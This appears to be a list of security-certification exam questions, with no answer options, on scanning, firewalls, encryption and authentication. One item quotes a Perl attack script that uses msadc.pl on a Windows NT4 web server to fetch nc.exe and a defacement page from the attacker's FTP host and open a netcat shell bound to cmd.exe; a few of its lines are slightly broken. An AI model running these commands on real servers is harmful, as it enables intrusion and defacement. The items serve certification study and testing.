Which NMAP command combination would let a tester scan every TCP port from a class C network that is
blocking ICMP with fingerprinting and service detection?

Which of the statements concerning proxy firewalls is correct?

One advantage of an application-level firewall is the ability to

A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web
server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the
tester come across a perl script that runs the following msadc functions:
system(“perl msadc.pl -h $host -C \\”echo open $your >testfile\\””);
system(“perl msadc.pl -h $host -C \\”echo $user>>testfile\\””);
system(“perl msadc.pl -h $host -C \\”echo $pass>>testfile\\””);
system(“perl msadc.pl -h $host -C \\”echo bin>>testfile\\””);
system(“perl msadc.pl -h $host -C \\”echo get nc.exe>>testfile\\””);
system(“perl msadc.pl -h $host -C \\”echo get hacked.html>>testfile\\””);
(“perl msadc.pl -h $host -C \\”echo quit>>testfile\\””);
system(“perl msadc.pl -h $host -C \\”ftp \\-s\\:testfile\\””);
$o=; print “Opening …\\n”;
system(“perl msadc.pl -h $host -C \\”nc -l -p $port -e cmd.exe\\””);
Which exploit is indicated by this script?

A recently hired network security associate at a local bank was given the responsibility to perform daily scans of
the internal network to look for unauthorized devices. The employee decides to write a script that will scan the
network for unauthorized devices every morning at 5:00 am.
Which of the following programming languages would most likely be used?

An engineer is learning to write exploits in C++ and is using the exploit tool Backtrack. The engineer wants to
compile the newest C++ exploit and name it calc.exe. Which command would the engineer use to accomplish
this?

To send a PGP encrypted message, which piece of information from the recipient must the sender have before
encrypting the message?

A person approaches a network administrator and wants advice on how to send encrypted email from home.
The end user does not want to have to pay for any license fees or manage server services. Which of the
following is the most secure encryption protocol that the network administrator should recommend?

A security engineer has been asked to deploy a secure remote access solution that will allow employees to
connect to the company’s internal network. Which of the following can be implemented to minimize the
opportunity for the man-in-the-middle attack to occur?

Which set of access control solutions implements two-factor authentication?